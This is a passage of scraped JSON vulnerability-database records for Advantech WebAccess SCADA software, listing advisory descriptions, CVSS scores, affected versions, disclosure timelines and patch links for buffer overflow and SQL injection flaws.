"@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201407-480" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech WebAccess bwocxrun Unsafe ActiveX Control Information Disclosure Vulnerability", "sources": [ { "db": "IVD", "id": "7d7fc401-463f-11e9-82e2-000c29342cb1" }, { "db": "IVD", "id": "e49f790a-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2014-04532" } ], "trust": 1.0 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "information disclosure", "sources": [ { "db": "CNNVD", "id": "CNNVD-201407-480" } ], "trust": 0.6 } }
var-201602-0484
Vulnerability from variot
This vulnerability allows remote attackers to execute arbitrary code on vulnerable instances of Advantech WebAccess. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of the 0x5239 IOCTL in the Kernel subsystem. A stack-based buffer overflow vulnerability exists in a call to strcpy with the ScadaNodeName parameter. An attacker can use this vulnerability to execute arbitrary code in the context of an administrator of the system.
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": null, "trust": 0.7, "vendor": "advantech", "version": null } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-153" } ] }, "credits": { "_id": null, "data": "Anonymous", "sources": [ { "db": "ZDI", "id": "ZDI-16-153" } ], "trust": 0.7 }, "cvss": { "_id": null, "data": [ { "cvssV2": [ { "acInsufInfo": null, "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "ZDI", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 8.6, "id": "ZDI-16-153", "impactScore": 10.0, "integrityImpact": "COMPLETE", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "HIGH", "trust": 0.7, "userInteractionRequired": null, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "ZDI", "id": "ZDI-16-153", "trust": 0.7, "value": "HIGH" } ] } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-153" } ] }, "description": { "_id": null, "data": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable instances of Advantech WebAccess. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of the 0x5239 IOCTL in the Kernel subsystem. A stack-based buffer overflow vulnerability exists in a call to strcpy with the ScadaNodeName parameter. An attacker can use this vulnerability to execute arbitrary code in the context of an administrator of the system.", "sources": [ { "db": "ZDI", "id": "ZDI-16-153" } ], "trust": 0.7 }, "external_ids": { "_id": null, "data": [ { "db": "ZDI_CAN", "id": "ZDI-CAN-3187", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-16-153", "trust": 0.7 } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-153" } ] }, "id": "VAR-201602-0484", "iot": { "_id": null, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.41739574 }, "last_update_date": "2022-05-17T01:36:38.829000Z", "patch": { "_id": null, "data": [ { "title": "This vulnerability is being disclosed publicly without a patch in accordance with the ZDI vulnerability disclosure policy on lack of vendor response.09/15/2015 - 09/17/2015 - ZDI disclosed reports to ICS-CERT (+1 more on 9/29/2015).09/15/2015 and 09/17/2015 - ICS-CERT acknowledged with a tracking number.10/06/2015 - ICS-CERT advised ZDI that the vendor was working on a patch tentatively planned for November.11/10/2015 - ICS-CERT advised ZDI that this patch/next version would be released in early December.12/14/2015 - ZDI asked ICS-CERT if a patch was available. 12/15/2015 - ICS-CERT advised ZDI that a patch release was expected \"any day now.\"12/15/2015 - ICS-CERT inquired with the vendor about the patch.01/06/2016 - ICS-CERT advised ZDI that the vendor released WebAccess 8.1.01/06/2016 - ZDI asked ICS-CERT what fixes are supposed to be in the build. 01/13/2016 - ICS-CERT provided ZDI with a written draft advisory.01/15/2016 - ICS-CERT published an advisory.01/15/2016 - ZDI asked ICS-CERT to confirm CVE mapping.01/22/2016 and 01/26/2016 - ZDI discussed with ICS-CERT by phone the concern that the patch seemed incomplete.01/27/2015 - ZDI concluded that this cases is not patched.02/01/2015 - ZDI notified ICS-CERT intent to release a 0-day advisory02/02/2015 - ZDI advisory released.-- Mitigation:Given the nature of the vulnerability, the only salient mitigation strategy is to restrict interaction with the service to trusted machines. Only the clients and servers that have a legitimate procedural relationship with the service should be permitted to communicate with it. This could be accomplished in a number of ways, most notably with firewall rules/whitelisting. These features are available in the native Windows Firewall, as described in and numerous other Microsoft Knowledge Base articles.", "trust": 0.7, "url": "http://technet.microsoft.com/en-us/library/cc725770%28ws.10%29.aspx" } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-153" } ] }, "references": { "_id": null, "data": [ { "trust": 0.7, "url": "http://technet.microsoft.com/en-us/library/cc725770%28ws.10%29.aspx" } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-153" } ] }, "sources": { "_id": null, "data": [ { "db": "ZDI", "id": "ZDI-16-153", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-153", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-153", "ident": null } ] }, "title": { "_id": null, "data": "(0Day) Advantech WebAccess datacore Service datacore.exe ScadaNodeName strcpy Stack-Based Buffer Overflow Remote Code Execution Vulnerability", "sources": [ { "db": "ZDI", "id": "ZDI-16-153" } ], "trust": 0.7 } }
var-201810-0493
Vulnerability from variot
WebAccess Versions 8.3.2 and prior. The application fails to properly validate the length of user-supplied data, causing a buffer overflow condition that allows for arbitrary remote code execution. WebAccess Contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Advantech WebAccess Client. Authentication is not required to exploit this vulnerability. The specific flaw exists within bwswfcfg.exe, which is accessed through the 0x2711 IOCTL in the webvrpcs process. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of Administrator. Advantech (Advantech) WebAccess software is the core of Advantech's IoT application platform solution, providing users with a user interface based on HTML5 technology to achieve cross-platform and cross-browser data access experience. A stack buffer overflow vulnerability exists in Advantech WebAccess. The vulnerability stems from the fact that the software failed to properly verify the length of the data provided by the user. Advantech WebAccess is prone to the following security vulnerabilities: 1. This may aid in further attacks. Advantech WebAccess is a browser-based HMI/SCADA software developed by Advantech. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": "lte", "trust": 1.8, "vendor": "advantech", "version": "8.3.2" }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.9, "vendor": "advantech", "version": "8.3.2" }, { "_id": null, "model": "webaccess", "scope": null, "trust": 0.7, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess", "scope": "lte", "trust": 0.6, "vendor": "advantech", "version": "\u003c=8.3.1" }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8.3.1" }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8.3" }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8.2" }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8.1" }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8" }, { "_id": null, "model": "webaccess", "scope": "ne", "trust": 0.3, "vendor": "advantech", "version": "8.3.3" }, { "_id": null, "model": null, "scope": "eq", "trust": 0.2, "vendor": "webaccess", "version": "*" } ], "sources": [ { "db": "IVD", "id": "e2fec8d0-39ab-11e9-b9a9-000c29342cb1" }, { "db": "ZDI", "id": "ZDI-18-1330" }, { "db": "CNVD", "id": "CNVD-2018-21937" }, { "db": "BID", "id": "105736" }, { "db": "JVNDB", "id": "JVNDB-2018-011340" }, { "db": "CNNVD", "id": "CNNVD-201810-1273" }, { "db": "NVD", "id": "CVE-2018-17910" } ] }, "configurations": { "_id": null, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2018-011340" } ] }, "credits": { "_id": null, "data": "Mat Powell of Trend Micro Zero Day Initiative", "sources": [ { "db": "ZDI", "id": "ZDI-18-1330" } ], "trust": 0.7 }, "cve": "CVE-2018-17910", "cvss": { "_id": null, "data": [ { "cvssV2": [ { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 8.6, "id": "CVE-2018-17910", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 1.8, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CNVD-2018-21937", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "e2fec8d0-39ab-11e9-b9a9-000c29342cb1", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.9 [IVD]" }, { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 8.6, "id": "VHN-128417", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 0.1, "vectorString": "AV:N/AC:M/AU:N/C:C/I:C/A:C", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "LOCAL", "author": "nvd@nist.gov", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "exploitabilityScore": 1.8, "id": "CVE-2018-17910", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.8, "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0" }, { "attackComplexity": "LOW", "attackVector": "LOCAL", "author": "ZDI", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "exploitabilityScore": 1.8, "id": "CVE-2018-17910", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 0.7, "userInteraction": "REQUIRED", "vectorString": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0" } ], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2018-17910", "trust": 1.0, "value": "HIGH" }, { "author": "NVD", "id": "CVE-2018-17910", "trust": 0.8, "value": "High" }, { "author": "ZDI", "id": "CVE-2018-17910", "trust": 0.7, "value": "HIGH" }, { "author": "CNVD", "id": "CNVD-2018-21937", "trust": 0.6, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-201810-1273", "trust": 0.6, "value": "HIGH" }, { "author": "IVD", "id": "e2fec8d0-39ab-11e9-b9a9-000c29342cb1", "trust": 0.2, "value": "HIGH" }, { "author": "VULHUB", "id": "VHN-128417", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "IVD", "id": "e2fec8d0-39ab-11e9-b9a9-000c29342cb1" }, { "db": "ZDI", "id": "ZDI-18-1330" }, { "db": "CNVD", "id": "CNVD-2018-21937" }, { "db": "VULHUB", "id": "VHN-128417" }, { "db": "JVNDB", "id": "JVNDB-2018-011340" }, { "db": "CNNVD", "id": "CNNVD-201810-1273" }, { "db": "NVD", "id": "CVE-2018-17910" } ] }, "description": { "_id": null, "data": "WebAccess Versions 8.3.2 and prior. The application fails to properly validate the length of user-supplied data, causing a buffer overflow condition that allows for arbitrary remote code execution. WebAccess Contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Advantech WebAccess Client. Authentication is not required to exploit this vulnerability. The specific flaw exists within bwswfcfg.exe, which is accessed through the 0x2711 IOCTL in the webvrpcs process. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of Administrator. Advantech (Advantech) WebAccess software is the core of Advantech\u0027s IoT application platform solution, providing users with a user interface based on HTML5 technology to achieve cross-platform and cross-browser data access experience. A stack buffer overflow vulnerability exists in Advantech WebAccess. The vulnerability stems from the fact that the software failed to properly verify the length of the data provided by the user. Advantech WebAccess is prone to the following security vulnerabilities:\n1. This may aid in further attacks. Advantech WebAccess is a browser-based HMI/SCADA software developed by Advantech. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment", "sources": [ { "db": "NVD", "id": "CVE-2018-17910" }, { "db": "JVNDB", "id": "JVNDB-2018-011340" }, { "db": "ZDI", "id": "ZDI-18-1330" }, { "db": "CNVD", "id": "CNVD-2018-21937" }, { "db": "BID", "id": "105736" }, { "db": "IVD", "id": "e2fec8d0-39ab-11e9-b9a9-000c29342cb1" }, { "db": "VULHUB", "id": "VHN-128417" } ], "trust": 3.33 }, "external_ids": { "_id": null, "data": [ { "db": "NVD", "id": "CVE-2018-17910", "trust": 4.3 }, { "db": "ICS CERT", "id": "ICSA-18-298-02", "trust": 3.4 }, { "db": "BID", "id": "105736", "trust": 2.0 }, { "db": "SECTRACK", "id": "1041957", "trust": 1.7 }, { "db": "CNNVD", "id": "CNNVD-201810-1273", "trust": 0.9 }, { "db": "CNVD", "id": "CNVD-2018-21937", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2018-011340", "trust": 0.8 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-7166", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-18-1330", "trust": 0.7 }, { "db": "IVD", "id": "E2FEC8D0-39AB-11E9-B9A9-000C29342CB1", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-128417", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "e2fec8d0-39ab-11e9-b9a9-000c29342cb1" }, { "db": "ZDI", "id": "ZDI-18-1330" }, { "db": "CNVD", "id": "CNVD-2018-21937" }, { "db": "VULHUB", "id": "VHN-128417" }, { "db": "BID", "id": "105736" }, { "db": "JVNDB", "id": "JVNDB-2018-011340" }, { "db": "CNNVD", "id": "CNNVD-201810-1273" }, { "db": "NVD", "id": "CVE-2018-17910" } ] }, "id": "VAR-201810-0493", "iot": { "_id": null, "data": true, "sources": [ { "db": "IVD", "id": "e2fec8d0-39ab-11e9-b9a9-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-21937" }, { "db": "VULHUB", "id": "VHN-128417" } ], "trust": 1.33470696 }, "iot_taxonomy": { "_id": null, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "e2fec8d0-39ab-11e9-b9a9-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-21937" } ] }, "last_update_date": "2024-11-23T21:38:15.771000Z", "patch": { "_id": null, "data": [ { "title": "Advantech WebAccess", "trust": 0.8, "url": "https://www.advantech.com/industrial-automation/webaccess/webaccessscada" }, { "title": "Advantech has issued an update to correct this vulnerability.", "trust": 0.7, "url": "https://ics-cert.us-cert.gov/advisories/ICSA-18-298-02" }, { "title": "Patch for Advantech WebAccess Stack Buffer Overflow Vulnerability (CNVD-2018-21937)", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/143397" }, { "title": "Advantech WebAccess Buffer error vulnerability fix", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=86345" } ], "sources": [ { "db": "ZDI", "id": "ZDI-18-1330" }, { "db": "CNVD", "id": "CNVD-2018-21937" }, { "db": "JVNDB", "id": "JVNDB-2018-011340" }, { "db": "CNNVD", "id": "CNNVD-201810-1273" } ] }, "problemtype_data": { "_id": null, "data": [ { "problemtype": "CWE-119", "trust": 1.9 }, { "problemtype": "CWE-121", "trust": 1.0 } ], "sources": [ { "db": "VULHUB", "id": "VHN-128417" }, { "db": "JVNDB", "id": "JVNDB-2018-011340" }, { "db": "NVD", "id": "CVE-2018-17910" } ] }, "references": { "_id": null, "data": [ { "trust": 4.1, "url": "https://ics-cert.us-cert.gov/advisories/icsa-18-298-02" }, { "trust": 1.7, "url": "http://www.securityfocus.com/bid/105736" }, { "trust": 1.7, "url": "http://www.securitytracker.com/id/1041957" }, { "trust": 0.8, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-17910" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-17910" }, { "trust": 0.3, "url": "http://webaccess.advantech.com" } ], "sources": [ { "db": "ZDI", "id": "ZDI-18-1330" }, { "db": "CNVD", "id": "CNVD-2018-21937" }, { "db": "VULHUB", "id": "VHN-128417" }, { "db": "BID", "id": "105736" }, { "db": "JVNDB", "id": "JVNDB-2018-011340" }, { "db": "CNNVD", "id": "CNNVD-201810-1273" }, { "db": "NVD", "id": "CVE-2018-17910" } ] }, "sources": { "_id": null, "data": [ { "db": "IVD", "id": "e2fec8d0-39ab-11e9-b9a9-000c29342cb1", "ident": null }, { "db": "ZDI", "id": "ZDI-18-1330", "ident": null }, { "db": "CNVD", "id": "CNVD-2018-21937", "ident": null }, { "db": "VULHUB", "id": "VHN-128417", "ident": null }, { "db": "BID", "id": "105736", "ident": null }, { "db": "JVNDB", "id": "JVNDB-2018-011340", "ident": null }, { "db": "CNNVD", "id": "CNNVD-201810-1273", "ident": null }, { "db": "NVD", "id": "CVE-2018-17910", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2018-10-28T00:00:00", "db": "IVD", "id": "e2fec8d0-39ab-11e9-b9a9-000c29342cb1", "ident": null }, { "date": "2018-10-31T00:00:00", "db": "ZDI", "id": "ZDI-18-1330", "ident": null }, { "date": "2018-10-28T00:00:00", "db": "CNVD", "id": "CNVD-2018-21937", "ident": null }, { "date": "2018-10-29T00:00:00", "db": "VULHUB", "id": "VHN-128417", "ident": null }, { "date": "2018-10-25T00:00:00", "db": "BID", "id": "105736", "ident": null }, { "date": "2019-01-10T00:00:00", "db": "JVNDB", "id": "JVNDB-2018-011340", "ident": null }, { "date": "2018-10-26T00:00:00", "db": "CNNVD", "id": "CNNVD-201810-1273", "ident": null }, { "date": "2018-10-29T18:29:08.823000", "db": "NVD", "id": "CVE-2018-17910", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2018-10-31T00:00:00", "db": "ZDI", "id": "ZDI-18-1330", "ident": null }, { "date": "2018-10-28T00:00:00", "db": "CNVD", "id": "CNVD-2018-21937", "ident": null }, { "date": "2019-10-09T00:00:00", "db": "VULHUB", "id": "VHN-128417", "ident": null }, { "date": "2018-10-25T00:00:00", "db": "BID", "id": "105736", "ident": null }, { "date": "2019-01-10T00:00:00", "db": "JVNDB", "id": "JVNDB-2018-011340", "ident": null }, { "date": "2019-10-17T00:00:00", "db": "CNNVD", "id": "CNNVD-201810-1273", "ident": null }, { "date": "2024-11-21T03:55:11.383000", "db": "NVD", "id": "CVE-2018-17910", "ident": null } ] }, "threat_type": { "_id": null, "data": "local", "sources": [ { "db": "CNNVD", "id": "CNNVD-201810-1273" } ], "trust": 0.6 }, "title": { "_id": null, "data": "WebAccess Buffer error vulnerability", "sources": [ { "db": "JVNDB", "id": "JVNDB-2018-011340" } ], "trust": 0.8 }, "type": { "_id": null, "data": "Buffer error", "sources": [ { "db": "IVD", "id": "e2fec8d0-39ab-11e9-b9a9-000c29342cb1" }, { "db": "CNNVD", "id": "CNNVD-201810-1273" } ], "trust": 0.8 } }
var-202005-0337
Vulnerability from variot
Advantech WebAccess Node, Version 8.4.4 and prior, Version 9.0.0. Input is not properly sanitized and may allow an attacker to inject SQL commands. Advantech WebAccess Node To SQL An injection vulnerability exists.Information may be obtained. This vulnerability allows remote attackers to disclose sensitive information on affected installations of Advantech WebAccess/SCADA. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of IOCTL 0x00013c71 in BwWebSvc.dll. The issue results from the lack of proper validation of a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to disclose stored credentials, leading to further compromise. Advantech WebAccess is a browser-based SCADA software package for monitoring, data acquisition, and visualization. It is used to automate complex industrial processes when remote operation is required. The vulnerability is caused by the program not properly sanitizing user input
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess/scada", "scope": null, "trust": 2.1, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 1.9, "vendor": "advantech", "version": "9.0.0" }, { "_id": null, "model": "webaccess", "scope": "lte", "trust": 1.0, "vendor": "advantech", "version": "8.4.4" }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.9, "vendor": "advantech", "version": "8.4.4" }, { "_id": null, "model": "webaccess node", "scope": "gte", "trust": 0.6, "vendor": "advantech", "version": "8.4.4" }, { "_id": null, "model": "webaccess node", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "9.0.0" }, { "_id": null, "model": null, "scope": "eq", "trust": 0.4, "vendor": "webaccess", "version": "*" }, { "_id": null, "model": null, "scope": "eq", "trust": 0.4, "vendor": "webaccess", "version": "9.0.0" } ], "sources": [ { "db": "IVD", "id": "c69f120f-13c6-4366-bc67-15c6b3fa728e" }, { "db": "IVD", "id": "dc75839d-760d-4e08-87b4-f1096616019c" }, { "db": "ZDI", "id": "ZDI-20-615" }, { "db": "ZDI", "id": "ZDI-20-613" }, { "db": "ZDI", "id": "ZDI-20-614" }, { "db": "CNVD", "id": "CNVD-2020-29741" }, { "db": "VULMON", "id": "CVE-2020-12014" }, { "db": "JVNDB", "id": "JVNDB-2020-005144" }, { "db": "NVD", "id": "CVE-2020-12014" } ] }, "configurations": { "_id": null, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2020-005144" } ] }, "credits": { "_id": null, "data": "Z0mb1E", "sources": [ { "db": "ZDI", "id": "ZDI-20-615" }, { "db": "ZDI", "id": "ZDI-20-613" }, { "db": "ZDI", "id": "ZDI-20-614" } ], "trust": 2.1 }, "cve": "CVE-2020-12014", "cvss": { "_id": null, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CVE-2020-12014", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 1.1, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "Low", "accessVector": "Network", "authentication": "None", "author": "NVD", "availabilityImpact": "None", "baseScore": 5.0, "confidentialityImpact": "Partial", "exploitabilityScore": null, "id": "JVNDB-2020-005144", "impactScore": null, "integrityImpact": "None", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "Medium", "trust": 0.8, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CNVD-2020-29741", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "c69f120f-13c6-4366-bc67-15c6b3fa728e", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "dc75839d-760d-4e08-87b4-f1096616019c", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "VHN-164650", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:N/C:P/I:N/A:N", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "ZDI", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "exploitabilityScore": 3.9, "id": "CVE-2020-12014", "impactScore": 3.6, "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 2.1, "userInteraction": "NONE", "vectorString": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0" }, { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "exploitabilityScore": 3.9, "id": "CVE-2020-12014", "impactScore": 3.6, "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, { "attackComplexity": "Low", "attackVector": "Network", "author": "NVD", "availabilityImpact": "None", "baseScore": 7.5, "baseSeverity": "High", "confidentialityImpact": "High", "exploitabilityScore": null, "id": "JVNDB-2020-005144", "impactScore": null, "integrityImpact": "None", "privilegesRequired": "None", "scope": "Unchanged", "trust": 0.8, "userInteraction": "None", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0" } ], "severity": [ { "author": "ZDI", "id": "CVE-2020-12014", "trust": 2.1, "value": "HIGH" }, { "author": "nvd@nist.gov", "id": "CVE-2020-12014", "trust": 1.0, "value": "HIGH" }, { "author": "NVD", "id": "JVNDB-2020-005144", "trust": 0.8, "value": "High" }, { "author": "CNVD", "id": "CNVD-2020-29741", "trust": 0.6, "value": "MEDIUM" }, { "author": "CNNVD", "id": "CNNVD-202005-299", "trust": 0.6, "value": "HIGH" }, { "author": "IVD", "id": "c69f120f-13c6-4366-bc67-15c6b3fa728e", "trust": 0.2, "value": "HIGH" }, { "author": "IVD", "id": "dc75839d-760d-4e08-87b4-f1096616019c", "trust": 0.2, "value": "HIGH" }, { "author": "VULHUB", "id": "VHN-164650", "trust": 0.1, "value": "MEDIUM" }, { "author": "VULMON", "id": "CVE-2020-12014", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "IVD", "id": "c69f120f-13c6-4366-bc67-15c6b3fa728e" }, { "db": "IVD", "id": "dc75839d-760d-4e08-87b4-f1096616019c" }, { "db": "ZDI", "id": "ZDI-20-615" }, { "db": "ZDI", "id": "ZDI-20-613" }, { "db": "ZDI", "id": "ZDI-20-614" }, { "db": "CNVD", "id": "CNVD-2020-29741" }, { "db": "VULHUB", "id": "VHN-164650" }, { "db": "VULMON", "id": "CVE-2020-12014" }, { "db": "JVNDB", "id": "JVNDB-2020-005144" }, { "db": "CNNVD", "id": "CNNVD-202005-299" }, { "db": "NVD", "id": "CVE-2020-12014" } ] }, "description": { "_id": null, "data": "Advantech WebAccess Node, Version 8.4.4 and prior, Version 9.0.0. Input is not properly sanitized and may allow an attacker to inject SQL commands. Advantech WebAccess Node To SQL An injection vulnerability exists.Information may be obtained. This vulnerability allows remote attackers to disclose sensitive information on affected installations of Advantech WebAccess/SCADA. 